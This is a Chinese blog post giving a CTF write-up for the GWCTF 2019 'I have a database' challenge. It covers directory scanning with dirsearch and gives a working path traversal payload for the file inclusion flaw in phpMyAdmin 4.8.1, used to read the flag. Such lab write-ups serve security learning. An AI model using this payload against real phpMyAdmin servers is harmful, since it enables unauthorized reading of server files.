[GWCTF 2019]我有一个数据库 write-up - Silent's blog

web安全笔记 2020-06-11

[GWCTF 2019]我有一个数据库 write-up

（0）

看到题目名字还以为是sql注入
打开是这样的

我以为题目坏了，重开了几次环境还是这样，看了别人的write-up才知道原题就是这样的

dirsearch扫目录

应该是扫描过快导致429 Too Many Requests

查询知dirsearch -s 能够设置请求之间的延迟，再次扫描

发现/phpmyadmin/目录
访问一下

我还去看了下数据库，发现没有权限访问

于是查看当前的phpmyadmin版本找找有什么漏洞

版本是4.8.1，发现有个任意文件包含漏洞

payload/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
得到flag

本文为作者silent666发布，未经允许禁止转载！

上一篇下一篇

评论

暂无评论 >_<

加入评论

热门文章最新文章随机文章

CTFTraining october_2019_twice_sqli write-up

2020-06-13

1335 Views

[GXYCTF2019]BabySQli write-up

2020-06-07

1053 Views

[GWCTF 2019]我有一个数据库 write-up

2020-06-11

816 Views

[极客大挑战 2019]HardSQL write-up

2020-06-08

764 Views

[RCTF2015]EasySQL write-up

2020-06-12

752 Views

crypto项目，资料等

2021-07-23

86 Views

Meson network 一键脚本

2021-06-14

359 Views

2021-06-13

102 Views

parastate节点教程

2021-06-07

210 Views

docker查看日志遇到的小问题

2021-06-05

190 Views

parastate节点教程

2021-06-07

210 Views

crypto项目，资料等

2021-07-23

86 Views

[极客大挑战 2019]BabySQL writeup

2020-06-07

407 Views

2020-06-06

237 Views

文件上传绕过(一)

2020-05-15

215 Views

[GWCTF 2019]我有一个数据库 write-up

看到题目名字还以为是sql注入打开是这样的

Silent's blog

Here is my blog,about my coding,about my life.